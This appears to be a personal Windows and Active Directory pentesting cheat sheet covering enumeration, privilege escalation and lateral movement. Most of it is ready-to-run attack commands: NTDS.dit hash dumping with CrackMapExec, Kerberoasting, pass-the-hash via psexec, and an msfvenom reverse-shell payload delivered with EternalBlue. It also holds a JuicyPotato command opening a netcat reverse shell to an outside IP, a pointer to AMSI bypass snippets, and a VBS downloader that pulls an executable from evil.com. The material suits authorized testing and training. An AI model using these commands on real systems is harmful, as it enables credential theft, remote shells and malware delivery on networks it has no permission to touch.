Pentesting Active Directory forests of BSOD boxes

General Resources

Active Directory

Initial discovery and enumeration

NetBios scan

sudo nbtscan -v -s : -r 10.10.10.0/24

Find domain controllers

Get the hostnames and ip addresses of DCs (Domain Controllers).

C:> ipconfig /all # Look for DNS entries
C:> nslookup <domain>
# Or
C:> nslookup
> set type=all
> _ldap._tcp.dc._msdcs.EXAMPLEDOMAIN

Active Directory enumeration

Bloodhound

BloodHound (docs) allows to find and visualize paths in the Active Directory structure. First use an ingestor such as SharpHound (.exe or .ps1) or BloodHound.py and feed the collected data into BloodHound's Neo4j database. The importing can be automated with bloodhound-import.

bloodhound-python -c All -u <user> -p <passwd> -d <domain>
bloodhound-import -du neo4j -dp <passwd> *.json
bloodhound

Bloodhound queries

# Accounts able to perform RBCD
# Source: https://twitter.com/KenjiEndo15/status/1578811281498599425
Match p=(g)-[:AddAllowedToAct|WriteAccountRestrictions]->(c:Computer) RETURN p

PingCastle

PingCastle by Vincent Le Toux is a Windows executable that will assess the most important security mis-configurations related to the Active Directory environment. Among its nifty features you can find AD objects graph visualisation and clear HTML reports.

Manual queries

Manually quering with dsquery and ldapsearch.

Local enumeration

General system info and config.

C:\> systeminfo
C:\> netsh firewall show state
C:\> netsh firewall show config
C:\> wmic os list brief
C:\> wmic qfe get Caption,Description,HotFixID,InstalledOn
C:\> net share
C:\> wmic useraccount

PS C:\> Get-WmiObject -Class Win32_OperatingSystem | select SystemDirectory,BuildNumber,SerialNumber,Version | ft
PS C:\> Get-Service | ? {$_.Status -eq "Running"}
PS C:\> Get-MpComputerStatus | findstr "True"
PS C:\> Get-WmiObject win32_useraccount

Search file names or directory names recursively with dir /s, find text in files with findstr.

C:\> dir /s *passw*
C:\> findstr /si passw *.txt

Look for unquoted Service Paths

C:\> wmic service get name,displayname,pathname,startmode | findstr /i "Auto"
C:\> sc qc <service> # Check for quotes and spaces in BINARY_PATH_NAME

Powershell

PS C:\> Get-ExecutionPolicy -List
PS C:\> Set-ExecutionPolicy Bypass -Scope Process

Services

PS C:\> Get-ACL -Path HKLM:\System\CurrentControlSet\Services\wuauserv | Format-List

Sysinternals

C:\> \\live.sysinternals.com\tools\procdump.exe -accepteula

Responder

When working on a Windows/AD environment, it is never a bad idea to have Responder running in the background. It is a wonderful and extremely featureful tool, I highly recommend that you check out its documentation.

Privilege escalation

Enumeration

Resources:

HackTricks with a checklist.

Tools:

PrivescCheck by itm4n: Powershell script.
windowsprivchecker by Tib3rius: Batch script.

NTDS.dit extraction

The NTDS.dit file is located on Domain Controllers and contains the password hashes of Active Directory users. There are various ways to extract them:

With local administrator access as described by Ultimate Windows Security (Volume Shadow Copy Service (VSS), Ntdsutil.exe, PowerSploit NinjaCopy).
Remotely via SMB with CrackMapExec:
```
$ cme smb -u Administrator -p Password123 --ntdis (drsuapi|vss) <target>
```
Once that the hashes are retrieved they can either be used 'as-is' (with pass-the-hash attacks for example, see below) or cracked to retrieve the plaintext user passwords.

Kerberoasting

Look for roastable accounts:

GetUserSPNs.py -request -dc-ip 10.10.10.10 <domain>/<user>:<passwd>

SMB shares

cme smb <domain> -u <user> -p <passwd> --shares

Abuse GenericAll and GeneralWrite

Pass-the-hash

By using Impacket's psexec:

$ python examples/psexec.py -hashes '<hash here>' username@10.1.2.3

MS17-010 - EternalBlue

Metasploit or external scripts, for example from helviojunior.

git clone https://github.com/helviojunior/MS17-010.git
cd MS17-010
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=7766 -f exe > eternalblue.exe
python2 send_and_execute.py <target> eternalblue.exe

JuicyPotato

Hacktricks on JuicyPotato. Check this Windows CLSID list if needed, use this script to extract all CLSIDs.

Here we spawn a netcat reverse shell with administrator privileges.

.\JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c C:\inetpub\wwwroot\nc.exe -e cmd.exe 192.168.119.132 8443" -t *

AMSI

AMSI.fail: Generate Powershell snippets to disable AMSI for the current process.

Windows Defender

List excluded paths

reg query "HKLM\Software\Microsoft\Windows Defender\Exclusions\Paths"

Misc

Remove password from Excel spreadsheet

A simple way to remove the password from protected cells is to unzip the spreadsheet, locate and remove the hash of the password and rezip.

7z x Protected.xlsx
sed -i -e 's/<sheetProtection.*\/>//g' xl/worksheets/sheet2.xml
7z a Unprotected.xlsx .
libreoffice Unprotected.xlsx

VBS snippets

File download

Uses Microsoft.XMLHTTP to download and save a file locally.

dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "http://www.evil.com/legit.exe", False
xHttp.Send
with bStrm
    .type = 1
    .open
    .write xHttp.responseBody
    .savetofile "C:\Users\Public\legit.exe", 2
end with

skywhi@dreamland:/var/log$ _